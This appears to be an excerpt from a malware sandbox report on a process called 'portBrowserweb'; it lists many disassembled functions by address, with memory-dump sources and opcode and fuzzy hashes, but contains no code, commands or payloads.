                                                                                              • Instruction ID: 8cc436859dfb4962bc0c2fd972601006d0951100e032e825298ecdb6ff38b406
                                                                                              • Opcode Fuzzy Hash: 727e36f531f6074a5210c119cac8dcf69f3a65c876cd5a533de22928e2da8b4a
                                                                                              • Instruction Fuzzy Hash: F3D14C70519655CBEB49CF18C4D15B5BBA2FF4A310B5485FDC88E8B68ACA38F885CBC1
                                                                                              Function 00007FFAAC86012F Relevance: .3, Instructions: 336COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc8e6f046e2747071902bf7e49072bbccfc9f096582fcf3c262ba28bca51bae0
                                                                                              • Instruction ID: d5b4658cb9d10919a5e81d3c5e9f46a3420727de1d1709a7d61566017c000a78
                                                                                              • Opcode Fuzzy Hash: bc8e6f046e2747071902bf7e49072bbccfc9f096582fcf3c262ba28bca51bae0
                                                                                              • Instruction Fuzzy Hash: 61C19E3091A546CBEB19CF18C0D45B577A1FF4A314B5485BDC88F8B68ADB38F485CB88
                                                                                              Function 00007FFAAC86F73F Relevance: .3, Instructions: 333COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b7f5a722a9915c8e3146ef7754f51a62f6d6cc7bb92ad71e48fadc504250d317
                                                                                              • Instruction ID: e6e3e5847bef8aa3d2098296f230290751f6f13c4898b85bce40e5a63aa4aed7
                                                                                              • Opcode Fuzzy Hash: b7f5a722a9915c8e3146ef7754f51a62f6d6cc7bb92ad71e48fadc504250d317
                                                                                              • Instruction Fuzzy Hash: 5AA1F07294E2529BE741BB6CD8A59FA7FE0EF06214F0881F7D04DCA293DD08B44A87D5
                                                                                              Function 00007FFAAC867C8F Relevance: .3, Instructions: 333COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ae89240707e4f562ef89a1e859fe18cb8b3b41e3a078ef28a6eea66d0ada01c
                                                                                              • Instruction ID: d999756199d0fce6d3adc21d4b8f8aa6b135589d4f6bbea62819e374ddf07949
                                                                                              • Opcode Fuzzy Hash: 4ae89240707e4f562ef89a1e859fe18cb8b3b41e3a078ef28a6eea66d0ada01c
                                                                                              • Instruction Fuzzy Hash: 7EC16D70519656CBEB49CF18C4905B5B7A2FF4A311B5485FDC88E8B68ACA38F885CBC1
                                                                                              Function 00007FFAAC864F48 Relevance: .3, Instructions: 282COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a75d9c1b456ff1cdf3498427a16957792602b4637b7f3ae7ffd3efd13f7b55c
                                                                                              • Instruction ID: a90238d5732ecacee189f0edd5373f5e15dc71b0647c07a2edd9044bbc6246aa
                                                                                              • Opcode Fuzzy Hash: 5a75d9c1b456ff1cdf3498427a16957792602b4637b7f3ae7ffd3efd13f7b55c
                                                                                              • Instruction Fuzzy Hash: 3E119351D5F287DAFA7A436819201BCEA417F4F750F5981F6D48E8A1C2DC6CB88C23D2
                                                                                              Function 00007FFAAC86FCF9 Relevance: .3, Instructions: 256COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 52d9abf440d6580e5254f5aed8a851949cec32ff10961f60327692d2cf1362b9
                                                                                              • Instruction ID: 0d5369f7b4651d6fa1c534f9b3e9a3bb1e142d4943babf0f399745a164d87acc
                                                                                              • Opcode Fuzzy Hash: 52d9abf440d6580e5254f5aed8a851949cec32ff10961f60327692d2cf1362b9
                                                                                              • Instruction Fuzzy Hash: 1E71F43190E54A8FF768DB1898566B4BBC0FF4E311F144AF9D05ECB5A3DA18F81A86C1
                                                                                              Function 00007FFAAC864BC7 Relevance: .3, Instructions: 252COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5bc0d0f4f3fecca8a996e2ffed730a615b0d50fbe7072b3bf34da61e322d7dcc
                                                                                              • Instruction ID: 020565dfd83da3ce7e6bf40df75d980dd60316e5b47c6cd4f4d707226097d55c
                                                                                              • Opcode Fuzzy Hash: 5bc0d0f4f3fecca8a996e2ffed730a615b0d50fbe7072b3bf34da61e322d7dcc
                                                                                              • Instruction Fuzzy Hash: F071D13690E4498BF768DB1884565B8B7C0FF8A715F0542F9D05EC7662EE28F80E86C1
                                                                                              Function 00007FFAAC866A66 Relevance: .3, Instructions: 251COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d9e1de01d56a1027342b4c9348bf147f1aac24d5a0885420486950ce8d54b98d
                                                                                              • Instruction ID: b8a66e0a13898a9e0e8b05abf9626676c91decb5cdee54ca98efe1938d384572
                                                                                              • Opcode Fuzzy Hash: d9e1de01d56a1027342b4c9348bf147f1aac24d5a0885420486950ce8d54b98d
                                                                                              • Instruction Fuzzy Hash: 6571052590DA82DBF3285B2894515B9FBE0FF4A314F1585BED08EC3592DA39F80A83C1
                                                                                              Function 00007FFAAC86C396 Relevance: .2, Instructions: 247COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc676d8d6000be0802c78dceb0efd1ded935309bcdf2c32cf60bfdfc5618a762
                                                                                              • Instruction ID: cdb1594f3464dcf2a63cc0654e1a843777723efd9386956035d9d11ac1846f0f
                                                                                              • Opcode Fuzzy Hash: bc676d8d6000be0802c78dceb0efd1ded935309bcdf2c32cf60bfdfc5618a762
                                                                                              • Instruction Fuzzy Hash: 0C71D63190E6428BF3699B28A84A575FBD0FF5A310F1485BED08EC3592DE19F80A83C5
                                                                                              Function 00007FFAAC86A7FD Relevance: .2, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e356fd8d0465c4d85845e603e06e1311cec2b7cf40b93922fb5082e4393027f
                                                                                              • Instruction ID: 01a4efa2513569f43d8d5b73254de6ce575cbac1230b9710fc2065613184c35e
                                                                                              • Opcode Fuzzy Hash: 9e356fd8d0465c4d85845e603e06e1311cec2b7cf40b93922fb5082e4393027f
                                                                                              • Instruction Fuzzy Hash: 0C71E27190E44A8FF768DB1888565F4B7C0FF4A310F2542F9D0AED76A2DA18F80A97C1
                                                                                              Function 00007FFAAC86A4A8 Relevance: .2, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ddb31e1e9010726b5da0adc7ea862b18625dd0e5f8adeb3ecc0a33053de216a
                                                                                              • Instruction ID: 94833d902309aafb65a2baddda7629af74461965be3d14621b0baf5fdefcec1b
                                                                                              • Opcode Fuzzy Hash: 4ddb31e1e9010726b5da0adc7ea862b18625dd0e5f8adeb3ecc0a33053de216a
                                                                                              • Instruction Fuzzy Hash: AE61923190E689CFFB55DB68C8556F9BBA0FF5A300F1441FAD00EE71A2DB24B8099791
                                                                                              Function 00007FFAAC868CB1 Relevance: .2, Instructions: 222COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 918461db1f8d45e7477f193e00495fc39651e2c214aa9a9ffb1f22dab0f864e9
                                                                                              • Instruction ID: 160fa4a945880028d993b93c3ba9747bc511991f9207d1b7c5f2637163756c35
                                                                                              • Opcode Fuzzy Hash: 918461db1f8d45e7477f193e00495fc39651e2c214aa9a9ffb1f22dab0f864e9
                                                                                              • Instruction Fuzzy Hash: 1F81AF3050AB46CFF368CB14D584571B7E1FF1A304F5489BDC48E8BA92CB29F8468B81
                                                                                              Function 00007FFAAC86E5E1 Relevance: .2, Instructions: 222COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ada7f209e89a5f27dff78feefbf1c83fd22590231e8945fa7b577c8273632539
                                                                                              • Instruction ID: 206a1670e71e5d786cf2a1e2f916b3e1175a84a73b8529fc114655bb47642922
                                                                                              • Opcode Fuzzy Hash: ada7f209e89a5f27dff78feefbf1c83fd22590231e8945fa7b577c8273632539
                                                                                              • Instruction Fuzzy Hash: 5B81A23050AB46CFE369DB14D595571F7A1FF0A300F1489BDD4AE87A92CA29F84AC781
                                                                                              Function 00007FFAAC86A460 Relevance: .2, Instructions: 201COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1eccdaeb1cc647848f43aea3b0d95d0294f2d156e3fae40a01b1e63335f61b16
                                                                                              • Instruction ID: e6401b10ae684d92478389069a6e13433f01872a54aeced37a6e6bf54c524e0f
                                                                                              • Opcode Fuzzy Hash: 1eccdaeb1cc647848f43aea3b0d95d0294f2d156e3fae40a01b1e63335f61b16
                                                                                              • Instruction Fuzzy Hash: 3551E861C4E686CFE7459BA8D8694F97FA0FF1A314F0840F6C04DD7293DE18B41A9781
                                                                                              Function 00007FFAAC86F8FA Relevance: .2, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 34b10a9c2eda9c3fe4e092e89f88db5e6cc2d756bc4e5c0e682ae5af51ab4c4d
                                                                                              • Instruction ID: 99730edfa6725739446f4118d4be111067dca9c6efad0e09fa3f3ab7b1a1b455
                                                                                              • Opcode Fuzzy Hash: 34b10a9c2eda9c3fe4e092e89f88db5e6cc2d756bc4e5c0e682ae5af51ab4c4d
                                                                                              • Instruction Fuzzy Hash: 4A510B3294E6969FE741AB6CD4B59F97FB0EF46318F0881B3D04ECA193DD18B44A8790
                                                                                              Function 00007FFAAC861777 Relevance: .1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bb90c410cc89624b5e72c96b0fc4373b7dae7308f1b0fa8a49efd3afc1ed67a8
                                                                                              • Instruction ID: cd567f1334012fd1a5d847a5c4f62390ee3aece22b76240ced3c4e8236b965c9
                                                                                              • Opcode Fuzzy Hash: bb90c410cc89624b5e72c96b0fc4373b7dae7308f1b0fa8a49efd3afc1ed67a8
                                                                                              • Instruction Fuzzy Hash: 7C41333160C954CFDF58EB1CC459DB5B7E1FF69320B0445AAD04EC3652DE20E895CB81
                                                                                              Function 00007FFAAC8692D7 Relevance: .1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7b087fb77e39c3845451814226727e86e14e048ae0c240b476342f3b4527e9e
                                                                                              • Instruction ID: 3e5c85850756045b5de8b6349fbfc97ff1d97b9334c91f1f25bf44f513326999
                                                                                              • Opcode Fuzzy Hash: a7b087fb77e39c3845451814226727e86e14e048ae0c240b476342f3b4527e9e
                                                                                              • Instruction Fuzzy Hash: FB41643160CA49CFDF98EB18D495EA5B7E1FB69320B0445A9D04EC3692DE25FC49CB81
                                                                                              Function 00007FFAAC86EC07 Relevance: .1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d55f3ef44c49ec216704e78a5dba317dfe1711aeb81489a92001d34f08ce8e50
                                                                                              • Instruction ID: 0ce0282b8dd5c80f73fa2d0ad1d92ece95da8eec102960d6647faffa10709f63
                                                                                              • Opcode Fuzzy Hash: d55f3ef44c49ec216704e78a5dba317dfe1711aeb81489a92001d34f08ce8e50
                                                                                              • Instruction Fuzzy Hash: 3F41747161D9088FDF98EB28C455EA4B7E1FFA9324B0445A9D00FC3552DE24F945CB81
                                                                                              Function 00007FFAAC869381 Relevance: .1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6cb42ee77c1af485c752c010f5c36077658034ab33c0e4b3e1dac64aedb0b9c
                                                                                              • Instruction ID: c44284ef28180360add65f2b433a7df420e33917fb7ac29493deb53178f2ad1b
                                                                                              • Opcode Fuzzy Hash: c6cb42ee77c1af485c752c010f5c36077658034ab33c0e4b3e1dac64aedb0b9c
                                                                                              • Instruction Fuzzy Hash: 4031803161CA458FDF98EB28C495EA4B7E1FB69310B0446ADD04EC76D2DE25FC49CB81
                                                                                              Function 00007FFAAC86ECB1 Relevance: .1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c668cb58b9be711b0822406371aff4e6c261380991e8575adf61a64a7884a4b4
                                                                                              • Instruction ID: 77fde17f86980da2535b10174c6cb3b02c7f6d581c61371eefee3d329ea4c2f5
                                                                                              • Opcode Fuzzy Hash: c668cb58b9be711b0822406371aff4e6c261380991e8575adf61a64a7884a4b4
                                                                                              • Instruction Fuzzy Hash: 1831B17160CA448FDB99EF28C095E64B7E1FFA9314B0446ADD05EC7293DE24E944CB81
                                                                                              Function 00007FFAAC861821 Relevance: .1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bff2db0abb832eec4d3c60ec21f683714a15c81c9a97c350a6f4d357364a9364
                                                                                              • Instruction ID: 72849a2cdeffe5ac70f420eafe8411b07a75a3bfd37ea5471f67dbcb2ea19797
                                                                                              • Opcode Fuzzy Hash: bff2db0abb832eec4d3c60ec21f683714a15c81c9a97c350a6f4d357364a9364
                                                                                              • Instruction Fuzzy Hash: F731403160CA548FDF5CEB2CC459EB5B7E1FF69321B0445AAD05EC7692CE24E885CB81
                                                                                              Function 00007FFAAC48095D Relevance: .1, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bca541f478e1eb31e17cf753dec7702460b02316f5159eb6f9789ecea02df4a7
                                                                                              • Instruction ID: 353210384f5105651c890bcb55ced4717f98fff8fe7020a27f06881973581849
                                                                                              • Opcode Fuzzy Hash: bca541f478e1eb31e17cf753dec7702460b02316f5159eb6f9789ecea02df4a7
                                                                                              • Instruction Fuzzy Hash: D431D222A5D6594FF748B77CE05AAF967C1DF49325B1484BAE40EC3293DC18A88183C8
                                                                                              Function 00007FFAAC480908 Relevance: .1, Instructions: 118COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aac19a7dba8768b9a4c22ec752e2d5b61f5362c51cf32f12f4cdb60902e8ae78
                                                                                              • Instruction ID: b2f728ff491c2f0cadca9b0a67624c13dd7e7a14f6a36a4277bd39cd3b975c40
                                                                                              • Opcode Fuzzy Hash: aac19a7dba8768b9a4c22ec752e2d5b61f5362c51cf32f12f4cdb60902e8ae78
                                                                                              • Instruction Fuzzy Hash: 8021E63130D8188FE768EB0CE88DAB973D1EB5A32170141BAE59EC7126D911EC8287C1
                                                                                              Function 00007FFAAC480960 Relevance: .1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3309f833bcb1974d72fa58914c118ec235aa09ea5d5be86089d766b274d794ce
                                                                                              • Instruction ID: df6b454e97a895a437294939f6391886aa7c5936975edd285fc41aae8f37722f
                                                                                              • Opcode Fuzzy Hash: 3309f833bcb1974d72fa58914c118ec235aa09ea5d5be86089d766b274d794ce
                                                                                              • Instruction Fuzzy Hash: 81310722A5D6594FF748B77CE05AAF863C1DF49325B1484BAE40EC32E3DC18AC8143C8
                                                                                              Function 00007FFAAC866B7D Relevance: .1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c27ccb1140d34b6e68335db2cebb8eb0fa934d51634eb105535ee5344cccee86
                                                                                              • Instruction ID: a3121786240ade6b4a1cd4399c3d5d4b7f2bb1941b2c82c1bd59562ceaa8f13f
                                                                                              • Opcode Fuzzy Hash: c27ccb1140d34b6e68335db2cebb8eb0fa934d51634eb105535ee5344cccee86
                                                                                              • Instruction Fuzzy Hash: D331E025A1EA82CBF3285B285806079FBD4FF5B318F1581BED4CEC7192D928F80A42C5
                                                                                              Function 00007FFAAC86931B Relevance: .1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 58d1d1eb2e113c15e43452f14a007f66ecaa56292aab3041804202df84a6440a
                                                                                              • Instruction ID: 529a7002ff55d240743a1959c065328c017810b9628599e17a82d29aaf120161
                                                                                              • Opcode Fuzzy Hash: 58d1d1eb2e113c15e43452f14a007f66ecaa56292aab3041804202df84a6440a
                                                                                              • Instruction Fuzzy Hash: C531923160CA49CFDF98EB28C495EA4B7E1FB69310B0445ADD04EC76D2DE24F849CB81
                                                                                              Function 00007FFAAC86EC4B Relevance: .1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e18be6e56b5c2e055b63ec9d8b25d5d294652988c452bf1e6e27ec23df45e054
                                                                                              • Instruction ID: 83abb4b4a42bf885b7340fc0b7dcbd3e134caec2912bad48f6500524043460ca
                                                                                              • Opcode Fuzzy Hash: e18be6e56b5c2e055b63ec9d8b25d5d294652988c452bf1e6e27ec23df45e054
                                                                                              • Instruction Fuzzy Hash: 7E31817161C9498FDB98EF28C095EA4B7E1FFA9314B0445A9D00FC7693DE24F945CB81
                                                                                              Function 00007FFAAC8617BB Relevance: .1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 600852bbdc5bb1cd8e8d28ad1f3c0a5ebfe7e1279eb16665544638e08f452323
                                                                                              • Instruction ID: af5af1dd11683d9b2cb0dc32b2fec9b0347181b2bf35efd46137509d3c12adde
                                                                                              • Opcode Fuzzy Hash: 600852bbdc5bb1cd8e8d28ad1f3c0a5ebfe7e1279eb16665544638e08f452323
                                                                                              • Instruction Fuzzy Hash: F331503160CA45CFDF98EB2CC459EB5B7E1FF69320B0445AAD00EC7692CE24E885CB81
                                                                                              Function 00007FFAAC86A63B Relevance: .1, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: efc284ca026a87911056b931eb79076e3d10fe1cf2f9b061507e4bc3bfec22f3
                                                                                              • Instruction ID: 5910e78b42c2c9594238411d197c02dfcd5ccb3238ee81721b930018e5f41529
                                                                                              • Opcode Fuzzy Hash: efc284ca026a87911056b931eb79076e3d10fe1cf2f9b061507e4bc3bfec22f3
                                                                                              • Instruction Fuzzy Hash: 5031F52190E547CAF6285754A5155F8B680FF4B321F1481FBD40F960C2DF0CF84967D2
                                                                                              Function 00007FFAAC8690E5 Relevance: .1, Instructions: 98COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2716206837.00007FFAAC860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC860000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac860000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fd4feee49548a870e5e1332b74df18f727b1023b2b951d9a181f1a33f78a6d08
                                                                                              • Instruction ID: 1973f26ddfc05ee1b4ada5d3d6d4a17a04dcd7cb094377e92a6ba6cb1632d3da
